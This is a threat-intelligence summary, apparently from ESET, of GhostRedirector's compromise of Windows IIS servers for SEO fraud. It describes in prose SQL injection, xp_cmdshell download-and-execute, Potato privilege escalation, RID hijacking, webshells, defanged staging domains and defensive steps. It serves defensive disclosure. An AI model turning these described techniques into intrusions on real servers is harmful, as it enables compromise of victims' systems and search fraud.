GhostRedirector hijacks Windows servers for SEO fraud

ESET researchers uncovered GhostRedirector, a previously unknown, China-aligned threat actor abusing Windows servers to both backdoor systems and run SEO fraud. The group blends a passive C++ backdoor (Rungan) with a malicious native IIS module (Gamshen) to persist, execute commands, and secretly manipulate Google search rankings.

Key takeaways

• At least 65 Windows servers were compromised (Dec 2024–Jun 2025), largely in Brazil, Thailand, Vietnam, Peru, and the USA (often as rented infrastructure).
• Victims span multiple sectors: education, healthcare, insurance, transportation, technology, and retail.
• Toolset includes: Rungan backdoor, Gamshen IIS module, privilege-escalation utilities leveraging EfsPotato/BadPotato, the Comdai helper library, Zunput site enumerator/webshell dropper, and GoToHTTP for remote access.
• Medium-confidence attribution to a China-aligned actor based on Chinese strings, a code-signing certificate tied to a Chinese company, and Chinese-language artifacts.

How they get in

• Likely initial access via SQL injection against public-facing apps.
• Attackers abused sqlserver.exe (xp_cmdshell) to run PowerShell or CertUtil, pulling payloads from a staging infrastructure at 868id[.]com and related domains.

Privilege escalation and persistence

• Custom .NET tools, often obfuscated with .NET Reactor and sometimes code-signed, used EfsPotato/BadPotato to add or elevate local admin users (e.g., MysqlServiceEx, MysqlServiceEx2, Admin) or hijack the Guest account via RID techniques.
• Attackers created fallback access through rogue admin accounts, remote access software (GoToHTTP), and webshells dropped across active IIS sites.

Rungan: passive C++ backdoor

• Installed as miniscreen.dll, Rungan registers HTTP Server API endpoints (bypassing IIS) and waits for exact HTTP requests to activate.
• Capabilities include: creating users, executing commands via cmd, and registering new listener URLs. Communication is plaintext HTTP with hardcoded parameters.

Gamshen: native IIS module for SEO fraud

• Intercepts requests only from Googlebot or Google referrers and only for non-static resources that match certain URL patterns.
• Fetches base64-encoded content from brproxy.868id[.]com and injects it into the response to create manipulative backlinks and keyword-rich pages.
• If content injection fails and a 404 would be returned, it redirects Googlebot to gobr.868id[.]com.
• The likely endgame: boost rankings and traffic to third-party (gambling) sites through SEO fraud as a service without changing what regular visitors see.

Zunput: site mapper and webshell deployer

• Enumerates IIS sites, confirms active dynamic content, and plants embedded ASP/PHP/JS webshells in those directories. Logs target details locally for later retrieval.

Comdai helper library

• Shared across tools, providing user management, HTTP requests, pipe-based IPC, directory listing, and service/registry helpers. PDB paths and artifacts tie it to the same developer set.

Why attribution points to China

• Chinese strings embedded in tools, a certificate issued to a Chinese company used for signing, and Chinese-language indicators in credentials. Overlap in victim regions and sectors with other China-aligned SEO fraud operations (e.g., DragonRank), but activity is tracked separately.

Defensive actions

• Patch and harden public-facing apps; prioritize SQLi prevention and WAF rules.
• Disable xp_cmdshell unless absolutely required; monitor sqlserver.exe invoking PowerShell/cmd.
• Audit IIS: enumerate and validate all loaded native/managed modules; remove unknown DLLs.
• Monitor HTTP Server API registrations (e.g., suspicious URLs like /v1.0/8888/sys.html).
• Hunt for malicious admin accounts and RID hijacking; enforce LAPS and strong account hygiene.
• Detect webshells in IIS site roots; baseline and alert on new .asp/.aspx/.php files.
• Block and monitor staging/C2 domains linked to 868id[.]com and related infrastructure.
• Review event logs, PowerShell transcripts, and EDR telemetry for download-and-execute chains.

Additional resources

• ESET provides IoCs, sample hashes, and MITRE ATT&CK mappings (Resource Development, Initial Access via Exploit Public-Facing Application, Persistence via IIS module load, Defense Evasion via obfuscation, C2 over HTTP, and Impact via search result manipulation).

Source: WeLiveSecurity